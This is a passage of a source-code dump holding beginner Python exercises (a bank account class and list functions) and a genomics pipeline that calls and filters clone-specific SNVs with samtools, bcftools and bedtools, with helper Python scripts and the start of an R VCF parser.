"avg_line_length": 35.10714340209961, "blob_id": "1b3e5e40d533fd732ef278ab6ee03572cedd99a9", "content_id": "e3778baf1ab6c319cf11f988212169fbdd6aa750", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 126, "num_lines": 28, "path": "/oop/bank_account.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "class BankAccount:\n def __init__(self, int_rate, balance,account_name):\n self.int_rate=int_rate\n self.balance=balance \n def deposit(self, amount):\n self.balance+=amount\n return(self)\n def withdraw(self, amount):\n if self.balance>=amount:\n self.balance-=amount\n else:\n print(\"Insufficient funds: charging a $5 fee\")\n self.balance-=5\n return(self)\n def display_account_info(self):\n\t print(\"Balance: \",self.balance)\n def yield_interest(self):\n if self.balance>0:\n self.balance=self.balance*self.int_rate\n return(self)\n\n# acct1=BankAccount(1.05,400 )\n# acct2=BankAccount(1.045,0)\n# # acct1.deposit(10).withdraw(5).display_account_info()\n# # print(acct1.balance)\n\n# acct1.deposit(75).deposit(50).deposit(100).withdraw(125).yield_interest().display_account_info()\n# acct2.deposit(500).deposit(200).withdraw(50).withdraw(20).withdraw(100).withdraw(75).yield_interest().display_account_info()\n" }, { "alpha_fraction": 0.6313633918762207, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 36.70588302612305, "blob_id": "065f9b56f0a4eeb3f1a0fd8422fa2805c38b9639", "content_id": "556296d592a0fc92f2b7a8128f819628dd75db23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5127, "license_type": "no_license", "max_line_length": 205, "num_lines": 136, "path": "/python_fundamentals/loop_basic2.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "# Biggie Size - Given a list, write a function that changes all positive numbers in the list to \"big\".\n# Example: biggie_size([-1, 3, 5, -5]) returns that same list, but whose values are now [-1, \"big\", \"big\", -5]\ndef biggie_size(mylist):\n for i in range(len(mylist)):\n if mylist[i]>0:\n mylist[i]=\"big\"\n return mylist\n#test case\nprint(biggie_size([-1, 3, 5, -5]))\nprint(\"Done with biggie size\")\n\n# Count Positives - Given a list of numbers, create a function to replace the last value with the number of positive values. (Note that zero is not considered to be a positive number).\n# Example: count_positives([-1,1,1,1]) changes the original list to [-1,1,1,3] and returns it\n# Example: count_positives([1,6,-4,-2,-7,-2]) changes the list to [1,6,-4,-2,-7,2] and returns it\ndef count_positives(mylist):\n count=0\n for i in range(len(mylist)):\n if mylist[i]>0:\n count+=1\n mylist[len(mylist)-1]=count\n return(mylist)\n#test case\nprint(count_positives([-1,1,1,1]))\nprint(count_positives([1,6,-4,-2,-7,-2]))\nprint(\"done with count_positives\")\n\n#Sum Total - Create a function that takes a list and returns the sum of all the values in the array.\n# Example: sum_total([1,2,3,4]) should return 10\n# Example: sum_total([6,3,-2]) should return 7\ndef sum_total(mylist):\n total=0\n for i in range(len(mylist)):\n total=total+mylist[i]\n return(total)\n#test case\nprint(sum_total([1,2,3,4]))\nprint(sum_total([6,3,-2]))\nprint(\"Done with sum_total()\")\n\n#Average - Create a function that takes a list and returns the average of all the values.\n# Example: average([1,2,3,4]) should return 2.5\ndef ave(mylist):\n count=len(mylist)\n total=0\n for i in range(len(mylist)):\n total=total+mylist[i]\n average=total/count\n return(average)\n#test case\nprint(ave([1,2,3,4]))# should return 2.5\nprint(\"done with ave()\")\n\n#Length - Create a function that takes a list and returns the length of the list.\n# Example: length([37,2,1,-9]) should return 4\n# Example: length([]) should return 0\ndef length(mylist):\n # assuming we aren't supposed to use len() here\n count=0\n for i in mylist:\n count+=1\n return(count)\n#test case\nprint(length([37,2,1,-9]))# should return 4\nprint(length([]))# should return 0\nprint(\"done with length()\")\n\n#Minimum - Create a function that takes a list of numbers and returns the minimum value in the list. If the list is empty, have the function return False.\n# Example: minimum([37,2,1,-9]) should return -9\n# Example: minimum([]) should return False\ndef minimum(mylist):\n if len(mylist)==0:\n return False\n else:\n val=mylist[0]# We'll assume the first element is the minimum, and correct it if needed as we go through the list\n for i in range(len(mylist)):\n if mylist[i]<val:\n val=mylist[i]\n return val\n#test case\nprint(minimum([37,2,1,-9]))\nprint(minimum([1,2,3,4]))\nprint(minimum([]))\nprint(\"Done with minimum()\")\n\n#Maximum - Create a function that takes a list and returns the maximum value in the array. If the list is empty, have the function return False.\n# Example: maximum([37,2,1,-9]) should return 37\n# Example: maximum([]) should return False\ndef maximum(mylist):\n if len(mylist)==0:\n return False\n else:\n val=mylist[0]# We'll assume the first element is the maximum, and correct it if needed as we go through the list\n for i in range(len(mylist)):\n if mylist[i]>val:\n val=mylist[i]\n return val\n#test case\nprint(maximum([37,2,1,-9]))\nprint(maximum([1,2,3,4]))\nprint(maximum([]))\nprint(\"Done with maximum()\")\n\n#Ultimate Analysis - Create a function that takes a list and returns a dictionary that has the sumTotal, average, minimum, maximum and length of the list.\n# Example: ultimate_analysis([37,2,1,-9]) should return {'sumTotal': 31, 'average': 7.75, 'minimum': -9, 'maximum': 37, 'length': 4 }\ndef ultimate_analysis(mylist):\n length=0\n minimum=mylist[0]\n maximum=mylist[0]\n sumtotal=0\n for i in mylist:\n length+=1 # Here we get our list length for use in the rest of the routine\n for i in range(length):\n if mylist[i]<minimum:\n minimum=mylist[i]\n elif mylist[i]>maximum:\n maximum=mylist[i]\n sumtotal=sumtotal+mylist[i]\n average=sumtotal/length\n return {'sumtotal':sumtotal,'average':average,'minimum':minimum,'maximum':maximum,'length':length}\n#test case\nprint(ultimate_analysis([37,2,1,-9]))\nprint(\"done with ultimate analysis\")\n\n#Reverse List - Create a function that takes a list and return that list with values reversed. Do this without creating a second list. (This challenge is known to appear during basic technical interviews.)\n# Example: reverse_list([37,2,1,-9]) should return [-9,1,2,37]\ndef reverse_list(mylist):\n lastindex=len(mylist)-1\n for i in range(int(lastindex/2)):\n temp=mylist[i]\n mylist[i]=mylist[lastindex-i]\n mylist[lastindex-i]=temp\n return mylist\n#test case\nprint(reverse_list([37,2,1,-9]))\nprint(reverse_list([11,10,9,8,7,6,5,4,3,2,1]))\nprint(\"done with reverse_list()\")" } ]
13
kieranrcampbell/clonealign-snv-analysis
https://github.com/kieranrcampbell/clonealign-snv-analysis
7a99043f40e976769e553c5b5803679ed2ae0bbf
5d9441f4a3efd5b8916db2d8a94ed7e24c4fc960
ba087a453efa0eefeeae4c21c878bcb1110bc33c
refs/heads/master
2021-08-30T17:16:19.121482
2017-12-18T19:33:24
2017-12-18T19:33:24
114,493,907
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6484622955322266, "alphanum_fraction": 0.6529908776283264, "avg_line_length": 43.29042053222656, "blob_id": "4a6f188db456270db7e9cd7967a43ba3ce674899", "content_id": "ddc1251b52c4d2a90d39f82de18adb2b552a1eab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14795, "license_type": "no_license", "max_line_length": 280, "num_lines": 334, "path": "/Snakefile", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "\"\"\"\nVariant calling for clones and 10x RNA-seq reads\n\n\"\"\"\n\n\nimport pandas as pd\n\nref_genome = \"/shahlab/kicampbell/reference/GRCh37-lite.fa\"\n\nclones = [\"A\", \"B\", \"C\"]\n\nrna_sample_names = \"SA501X2B\"\ndna_sample_names = \"SA501X3F\"\n\ncell_barcode_df = pd.read_csv(\"data/{}/rna/clone_assignments_{}.csv\".format(rna_sample_names, rna_sample_names))\ncell_barcodes = cell_barcode_df['barcode'].tolist()[0:10]\n\n\n\ndna_clone_variant_bcfs = expand(\"data/{dna_sample_name}/dna/variants/bcf/{dna_sample_name}-clone_{clone}_variants.bcf\",\ndna_sample_name = dna_sample_names, clone = clones)\ndna_clone_variant_vcfs = expand(\"data/{dna_sample_name}/dna/variants/vcf/{dna_sample_name}-clone_{clone}_variants.vcf\",\ndna_sample_name = dna_sample_names, clone = clones)\ndna_initial_snvs = expand(\"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_{clone}_variants.bed\",\ndna_sample_name = dna_sample_names, clone = clones)\ndna_clone_specific_beds_unfiltered = expand(\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs.bed\", dna_sample_name = dna_sample_names, clone = clones)\n\ndna_depths = expand(\"data/{dna_sample_name}/dna/variants/clone_variant_depths/{dna_sample_name}_SNVs_from_clone_{snv_clone}_depth_in_clone_{bam_clone}.tsv\", dna_sample_name = dna_sample_names, snv_clone = clones, bam_clone = clones)\n\ndna_clone_specific_beds_filtered = expand(\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs_filtered.bed\", dna_sample_name = dna_sample_names, clone = clones)\n\n\n\nrna_cell_bams = expand(\"data/{rna_sample_name}/rna/bam/{rna_sample_name}_cell_{barcode}.bam\", \n rna_sample_name = rna_sample_names, barcode = cell_barcodes)\nrna_cell_pileup = expand(\"data/{rna_sample_name}/rna/variants/bcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.bcf\", rna_sample_name = rna_sample_names, barcode = cell_barcodes, clone = clones, dna_sample_name = dna_sample_names)\nrna_cell_variants = expand(\"data/{rna_sample_name}/rna/variants/vcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.vcf\", rna_sample_name = rna_sample_names, barcode = cell_barcodes, clone = clones, dna_sample_name = dna_sample_names)\ncollate_logs = expand(\"data/{rna_sample_name}/rna/variants/logs/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.txt\",\nrna_sample_name = rna_sample_names, barcode = cell_barcodes, clone = clones, dna_sample_name = dna_sample_names)\n\nclone_bam_merge_list = expand(\"data/{rna_sample_name}/rna/clone_merge_lists/bams_for_clone_{clone}.txt\",\nrna_sample_name = rna_sample_names, clone = clones)\nbams_merged = expand(\"data/{rna_sample_name}/rna/bam_merged/{rna_sample_name}_clone_{clone}.bam\", \nrna_sample_name = rna_sample_names, clone = clones)\nvcf_merged_by_clone = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.vcf\", \nrna_sample_name = rna_sample_names, clone = clones)\nmerged_beds = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.bed\",\nrna_sample_name = rna_sample_names, clone = clones)\nmerged_bed = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones.bed\", rna_sample_name = rna_sample_names, clone = clones)\nmerged_bed_sorted = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones_sorted.bed\", rna_sample_name = rna_sample_names, clone = clones)\n\n# vcf_on_all_clones = expand(\"data/{rna_sample_name}/rna/vcf_all_clone_merged/{rna_sample_name}_all_clones.vcf\",\n# rna_sample_name = rna_sample_names)\n# bams_merged_string = \" \".join(bams_merged)\n\nrule all:\n input:\n # dna_initial_snvs,\n # dna_clone_specific_beds_unfiltered,\n # dna_depths,\n # dna_clone_specific_beds_filtered,\n # rna_cell_pileup#,\n rna_cell_bams,\n clone_bam_merge_list,\n bams_merged,\n vcf_merged_by_clone,\n merged_beds,\n merged_bed_sorted\n # vcf_on_all_clones\n\n\n# RNA here -----------------\n\n\n\nrule split_rna_sam_on_barcode:\n input:\n \"data/{}/rna/bam_from_10x/{}_possorted_genome_bam.bam\".format(rna_sample_names, rna_sample_names)\n output:\n \"data/{rna_sample_name}/rna/bam/{rna_sample_name}_cell_{barcode}.bam\"\n shell:\n \"samtools view -h {input} | grep '^\\\\@\\\\|{wildcards.barcode}' | samtools view -Sb -o {output} -\"\n\nrule create_merge_lists:\n input:\n bams=rna_cell_bams,\n csv=\"data/{rna_sample_name}/rna/clone_assignments_{rna_sample_name}.csv\"\n output:\n \"data/{rna_sample_name}/rna/clone_merge_lists/bams_for_clone_{clone}.txt\"\n shell:\n \"python3 scripts/bams_for_merging.py --clone {wildcards.clone} --sample_name {wildcards.rna_sample_name} --input_csv {input.csv} > {output}\"\n\nrule merge_bams:\n input:\n \"data/{rna_sample_name}/rna/clone_merge_lists/bams_for_clone_{clone}.txt\"\n output:\n \"data/{rna_sample_name}/rna/bam_merged/{rna_sample_name}_clone_{clone}.bam\"\n shell:\n \"samtools merge -b {input} {output}\"\n\n\nrule rna_pileup_on_merged_bam:\n input:\n bams=\"data/{rna_sample_name}/rna/bam_merged/{rna_sample_name}_clone_{clone}.bam\",\n bed=\"data/{rna_sample_name}/rna/beds/highly_expressed_genes.bed\",\n ref=ref_genome\n output:\n \"data/{rna_sample_name}/rna/bcf_clone_merged/{rna_sample_name}_clone_{clone}.bcf\"\n shell:\n \"samtools mpileup -l {input.bed} -R -g -f {input.ref} {input.bam} > {output}\"\n\nrule rna_call_variants_by_clone:\n input:\n \"data/{rna_sample_name}/rna/bcf_clone_merged/{rna_sample_name}_clone_{clone}.bcf\"\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.vcf\"\n shell:\n \"bcftools call -c -v {input} > {output}\"\n\nrule merge_variants_to_bed:\n input:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.vcf\"\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.bed\"\n shell:\n \"vcf2bed < {input} > {output}\"\n\nrule merge_all_merged_variants:\n input:\n merged_beds\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones.bed\"\n run:\n shell(\"rm -rf {output}\")\n for bed in merged_beds:\n shell(\"cat {bed} >> {output}\")\n\nrule sort_merged_variants:\n input:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones.bed\"\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones_sorted.bed\"\n shell:\n \"bedtools sort -i {input} > {output}\"\n\n\n# rule rna_pileup_on_all_clone_merge:\n# input:\n# bams=bams_merged,\n# bed=\"data/{rna_sample_name}/rna/beds/highly_expressed_genes.bed\",\n# ref=ref_genome\n# output:\n# \"data/{rna_sample_name}/rna/bcf_all_clone_merged/{rna_sample_name}_all_clones.bcf\"\n# shell:\n# \"samtools mpileup -l {input.bed} -R -g -f {input.ref} {bams_merged_string} > {output}\"\n\n# rule rna_call_variants_on_all_clone_merged:\n# input:\n# \"data/{rna_sample_name}/rna/bcf_all_clone_merged/{rna_sample_name}_all_clones.bcf\"\n# output:\n# \"data/{rna_sample_name}/rna/vcf_all_clone_merged/{rna_sample_name}_all_clones.vcf\"\n# shell:\n# \"bcftools call -c -v {input} > {output}\"\n\n# rule rna_pileup:\n# input:\n# clone_bedfile=\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs_filtered.bed\",\n# bam=\"data/{rna_sample_name}/rna/bam/{rna_sample_name}_cell_{barcode}.bam\",\n# ref = ref_genome\n# output:\n# \"data/{rna_sample_name}/rna/variants/bcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.bcf\"\n# shell:\n# \"samtools mpileup -l {input.clone_bedfile} -R -g -f {input.ref} {input.bam} > {output}\"\n\n# rule rna_call_variants:\n# input:\n# \"data/{rna_sample_name}/rna/variants/bcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.bcf\"\n# output:\n# \"data/{rna_sample_name}/rna/variants/vcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.vcf\"\n# shell:\n# \"bcftools call -c -v {input} > {output}\"\n\n# rule rna_collate_snvs:\n# input:\n# \"data/{rna_sample_name}/rna/variants/vcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.vcf\"\n# output:\n# \"data/{rna_sample_name}/rna/variants/logs/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.txt\"\n# shell:\n# \"\"\"\n# Rscript scripts/parse_vcf.R --input_vcf {input} --cell_barcode {wildcards.barcode} --clone {wildcards.clone} >> data/{wildcards.rna_sample_name}/rna/variants/cell_snps.csv\n# touch {output}\n# \"\"\"\n\n\n\n# DNA specific analysis here ------\n\nrule dna_pileup:\n input:\n bamfile = \"data/{dna_sample_name}/dna/bam/{dna_sample_name}-cluster_{clone}.sorted.realigned.rmdups.bam\",\n ref = ref_genome\n output:\n \"data/{dna_sample_name}/dna/variants/bcf/{dna_sample_name}-clone_{clone}_variants.bcf\"\n shell:\n \"samtools mpileup -R -g -f {input.ref} {input.bamfile} > {output}\"\n\nrule dna_bcf_to_vcf:\n input:\n \"data/{dna_sample_name}/dna/variants/bcf/{dna_sample_name}-clone_{clone}_variants.bcf\"\n output:\n \"data/{dna_sample_name}/dna/variants/vcf/{dna_sample_name}-clone_{clone}_variants.vcf\"\n shell:\n \"bcftools call -c -v {input} > {output}\"\n\nrule dna_vcf_to_bed:\n input:\n \"data/{dna_sample_name}/dna/variants/vcf/{dna_sample_name}-clone_{clone}_variants.vcf\"\n output:\n \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_{clone}_variants.bed\"\n shell:\n \"vcf2bed < {input} > {output}\"\n\nrule temp_intersect:\n input:\n bedA = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_A_variants.bed\",\n bedB = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_B_variants.bed\"\n output:\n \"data/{dna_sample_name}/dna/variants/tmp_intersect/SA501X3F-intersect_AB.bed\"\n shell:\n \"bedtools intersect -a {input.bedA} -b {input.bedB} > {output}\"\n\nrule germline_intersect:\n input:\n bedAB = \"data/{dna_sample_name}/dna/variants/tmp_intersect/SA501X3F-intersect_AB.bed\",\n bedC = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_A_variants.bed\"\n output:\n \"data/{dna_sample_name}/dna/variants/germline_intersect/{dna_sample_name}-germline_SNVs.bed\"\n shell:\n \"bedtools intersect -a {input.bedAB} -b {input.bedC} > {output}\"\n\nrule clone_specific_beds:\n input:\n bed = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_{clone}_variants.bed\",\n germline = \"data/{dna_sample_name}/dna/variants/germline_intersect/{dna_sample_name}-germline_SNVs.bed\"\n output:\n \"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs.bed\"\n shell:\n \"bedtools subtract -a {input.bed} -b {input.germline} > {output}\"\n\nrule dna_depth:\n input:\n snvs = \"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{snv_clone}_SNVs.bed\",\n bam = \"data/{dna_sample_name}/dna/bam/{dna_sample_name}-cluster_{bam_clone}.sorted.realigned.rmdups.bam\"\n output:\n \"data/{dna_sample_name}/dna/variants/clone_variant_depths/{dna_sample_name}_SNVs_from_clone_{snv_clone}_depth_in_clone_{bam_clone}.tsv\"\n shell:\n \"samtools depth -b {input.snvs} {input.bam} > {output}\"\n\nrule filter_beds:\n input:\n bed=\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs.bed\",\n depth=dna_depths\n output:\n \"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs_filtered.bed\"\n shell:\n \"\"\"\n rm -f {output}\n python3 scripts/filter_snv.py --input_bed {input.bed} --depth_template data/{wildcards.dna_sample_name}/dna/variants/clone_variant_depths/{wildcards.dna_sample_name}_SNVs_from_clone_{wildcards.clone}_depth_in_clone_CLONE.tsv --clone {wildcards.clone} --output_bed {output}\n \"\"\"\n\n\n# python scripts/filter_snv.py --input_bed data/SA501X3F/dna/variants/clone_specific_beds/SA501X3F-clone_C_SNVs.bed --depth_template data/SA501X3F/dna/variants/clone_variant_depths/SA501X3F_SNVs_from_clone_C_depth_in_clone_CLONE.tsv --clone C --output_bed tmp.bed\n\n\n# rule rna_pileup:\n# input: \n# bamfile = \"data/rna/bam/{sample_name}_cell_{barcode}.bam\",\n# ref = ref_genome\n# output:\n# \"data/rna/variants/bcf/{sample_name}-cell_{barcode}_variants.bcf\"\n# shell:\n# \"samtools mpileup -R -g -f {input.ref} {input.bamfile} > {output}\"\n\n# rule rna_bcf_to_vcf:\n# input:\n# \"data/rna/variants/bcf/{sample_name}-cell_{barcode}_variants.bcf\"\n# output:\n# \"data/rna/variants/vcf/{sample_name}-cell_{barcode}_variants.vcf\"\n# shell:\n# \"bcftools call -c -v {input} > {output}\"\n\n\n\n# rule split_rna_sam_on_barcode:\n# input:\n# \"data/rna/bam_from_10x/{}_possorted_genome_bam.bam\".format(rna_sample_name)\n# output:\n# rna_cell_bams\n# shell:\n# \"\"\"\n# samtools view data/rna/bam_from_10x/SA501X2B_possorted_genome_bam.bam | head | awk -F \"\\t\" 'match($0, /CB:Z:[ACGT]-1/) {if (RSTART>0){OUTPUT=substr($0,RSTART+5,18); print $0 >> \"data/rna/bam/\"OUTPUT\".sam\"}}'\n# samtools view -H data/rna/bam_from_10x/SA501X2B_possorted_genome_bam.bam > tmp_header.sam\n# for f in data/rna/sam/*.sam\n# do\n# b=`basename $f .sam`\n# cat tmp_header.sam $f.sam | samtools view -b - > $b.bam\n# done\n# \"\"\"\n\n# rule rna_bam_to_fastq:\n# input:\n# \"data/rna/bam/{sample_name}_cell_{barcode}.bam\"\n# output:\n# \"data/rna/fastq/{sample_name}_cell_{barcode}.fastq\"\n# shell:\n# \"bedtools bamtofastq -i {input} -fq {output}\"\n\n# rule star_index:\n# input:\n# ref_genome\n# output:\n# \"data/rna/star_index/genomeParameters.txt\"\n# shell:\n# \"STAR --runMode genomeGenerate --genomeDir data/rna/star_index --genomeFastaFiles {input}\"\n\n# rule rna_realign:\n# input:\n# fastq = \"data/rna/fastq/{sample_name}_cell_{barcode}.fastq\",\n# star_index = \"data/rna/star_index/genomeParameters.txt\"\n# output:\n# \"data/rna/bam_realigned/{sample_name}_cell_{barcode}.bam\"\n# shell:\n# \"STAR --genomeDir data/rna/star_index --readFilesIn {input.fastq}\"\n\n\n" }, { "alpha_fraction": 0.5923792719841003, "alphanum_fraction": 0.6154186725616455, "avg_line_length": 26.66666603088379, "blob_id": "9a1542553f8ae80b4e2299f4d87a078e0584629e", "content_id": "bd7e5b71ae60738387e1f230a4eb4674472181d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2257, "license_type": "no_license", "max_line_length": 114, "num_lines": 81, "path": "/scripts/get_read_depth.py", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "# coding: utf-8\nimport subprocess\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import binom\nimport vcf\nimport gzip\nimport argparse\n\nfrom joblib import Parallel, delayed\n\n\n\ndef get_depth(chr, snv_pos, file):\n arg = \"{}:{}-{}\".format(chr, snv_pos, snv_pos)\n\n result = subprocess.check_output(['samtools', 'depth', '-r', arg, file])\n result = result.decode(\"utf-8\")\n\n depth = -1\n if len(result) == 0:\n depth = '0'\n else:\n depth = result.split(\"\\t\")[2].strip()\n\n return depth\n\ndef wrap_depth_function(series, clone):\n path = 'path' + clone\n return get_depth(series['chr'], series['pos'], series[path])\n\ndef filter_record(bam_1, bam_2, record):\n chr = record[0]\n pos = record[1] \n af1 = record[2]\n af1 = round(af1 / 0.5) * 0.5 # Round to nearest .5\n depth1 = float(get_depth(chr, pos, bam_1))\n depth2 = float(get_depth(chr, pos, bam_2))\n\n p = af1\n if p == 1.0:\n p = 0.99\n\n pval1 = binom.cdf(0, depth1, p)\n pval2 = binom.cdf(0, depth2, p)\n\n if pval1 < 0.05 and pval2 < 0.05:\n return \"{}_{}\".format(chr, pos)\n else:\n return None\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_vcf\")\n parser.add_argument(\"--bam_template\")\n parser.add_argument(\"--clone\")\n parser.add_argument(\"--output_vcf\")\n args = parser.parse_args()\n\n readdepth_clones = list(set([\"A\", \"B\", \"C\"]) - set(args.clone))\n bam_1 = args.bam_template.replace(\"CLONE\", readdepth_clones[0])\n bam_2 = args.bam_template.replace(\"CLONE\", readdepth_clones[1])\n\n vcf_reader = vcf.Reader(open(args.input_vcf, 'rb'))\n vcf_writer = vcf.Writer(open(args.output_vcf, 'w'), vcf_reader)\n\n records = [[record.CHROM, record.POS, float(record.INFO['AF1'])] for record in vcf_reader]\n keys = [\"{}_{}\".format(record.CHROM, record.POS) for record in vcf_reader]\n\n record_dict = dict(zip(keys, [record for record in vcf_reader]))\n\n\n passed_record_keys = Parallel(n_jobs = 20)(delayed(filter_record)(bam_1, bam_2, record) for record in records)\n\n passed_record_keys = [x for x in passed_record_keys if x is not None]\n\n for key in passed_record_keys:\n vcf_writer.write_record(record_dict[key])\n \n\n\n \n\n\n\n\n" }, { "alpha_fraction": 0.5751730799674988, "alphanum_fraction": 0.6013847589492798, "avg_line_length": 33.55172348022461, "blob_id": "6615c7e32d85744bf547ab4cbcefdc3a8e3ace14", "content_id": "697d77a7a38f41f7fa145aa85571539d00e17292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2022, "license_type": "no_license", "max_line_length": 118, "num_lines": 58, "path": "/scripts/filter_snv.py", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "# coding: utf-8\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import binom\nimport argparse\n\n\n\n\ndef test_row(row):\n af1 = row['af1']\n depth1 = row['depth1']\n depth2 = row['depth2']\n p = af1\n if p == 1.0:\n p = 0.99\n pval1 = binom.cdf(0, depth1, p)\n pval2 = binom.cdf(0, depth2, p)\n return pval1 < 0.05 and pval2 < 0.05\n\ndef parse_info(AF_line):\n split = AF_line.split(\";\")\n af1_text = [x for x in split if \"AF1\" in x][0]\n af1 = float(af1_text.split(\"=\")[1])\n return af1\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_bed\")\n parser.add_argument(\"--depth_template\")\n parser.add_argument(\"--clone\")\n parser.add_argument(\"--output_bed\")\n args = parser.parse_args()\n\n readdepth_clones = list(set([\"A\", \"B\", \"C\"]) - set(args.clone))\n depth_1_file = args.depth_template.replace(\"CLONE\", readdepth_clones[0])\n depth_2_file = args.depth_template.replace(\"CLONE\", readdepth_clones[1])\n\n df_1 = pd.read_csv(depth_1_file, sep = \"\\t\", header = None, names = [\"chrom\", \"chromEnd\", \"depth\" + \"1\"])\n df_2 = pd.read_csv(depth_2_file, sep = \"\\t\", header = None, names = [\"chrom\", \"chromEnd\", \"depth\" + \"2\"])\n\n # Parse input\n names = ['chrom', 'chromStart', 'chromEnd', 'strand', 'score', 'ref', 'alt', 'alt_strand', 'allele_info', 'info1']\n input_bed_df = pd.read_csv(args.input_bed, sep = \"\\t\", header = None, names = names, index_col = False)\n input_bed_df['af1'] = input_bed_df.allele_info.apply(parse_info)\n\n df_merged = pd.merge(input_bed_df, df_1, how = 'left', on = ['chrom', 'chromEnd'])\n df_merged = pd.merge(df_merged, df_2, how = 'left', on = ['chrom', 'chromEnd'])\n\n df_merged.depth1.fillna(0, inplace = True)\n df_merged.depth2.fillna(0, inplace = True)\n\n keep_variant = df_merged.apply(test_row, axis = 1)\n\n df_merged = df_merged.loc[keep_variant]\n\n df_merged.to_csv(args.output_bed, sep = \"\\t\", columns = names, index = False, header = False)\n\n\n \n\n\n \n\n\n\n\n" }, { "alpha_fraction": 0.6505190134048462, "alphanum_fraction": 0.6522491574287415, "avg_line_length": 26.5238094329834, "blob_id": "057258e4e7e44a8839ca0184615116a73e8b9526", "content_id": "931c47f747fd553a6075ba5354d70fa61f686d5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 122, "num_lines": 21, "path": "/scripts/bams_for_merging.py", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nimport pandas as pd\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_csv\")\n parser.add_argument(\"--sample_name\")\n parser.add_argument(\"--clone\")\n args = parser.parse_args()\n\n clone_assign_df = pd.read_csv(args.input_csv)\n\n bcodes = clone_assign_df.loc[clone_assign_df.clone == args.clone].barcode\n\n barcodes = list(bcodes)\n\n paths = [\"data/{}/rna/bam/{}_cell_{}.bam\".format(args.sample_name, args.sample_name, barcode) for barcode in barcodes]\n\n print(\"\\n\".join(paths))\n" }, { "alpha_fraction": 0.6146953701972961, "alphanum_fraction": 0.6218637824058533, "avg_line_length": 30, "blob_id": "076f01082798f7002a00907983fb5d9d0d9a56f0", "content_id": "0334959d524cda6c7b4f8c108ea82c485a77158e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 558, "license_type": "no_license", "max_line_length": 62, "num_lines": 18, "path": "/scripts/parse_vcf.R", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "suppressPackageStartupMessages(library(VariantAnnotation))\nsuppressPackageStartupMessages(library(dplyr))\nsuppressPackageStartupMessages(library(aargh))\n\nparse_vcf <- function(input_vcf = \"input.vcf\",\n cell_barcode = \"cell_barcode\",\n clone = \"A\") {\n vcf <- 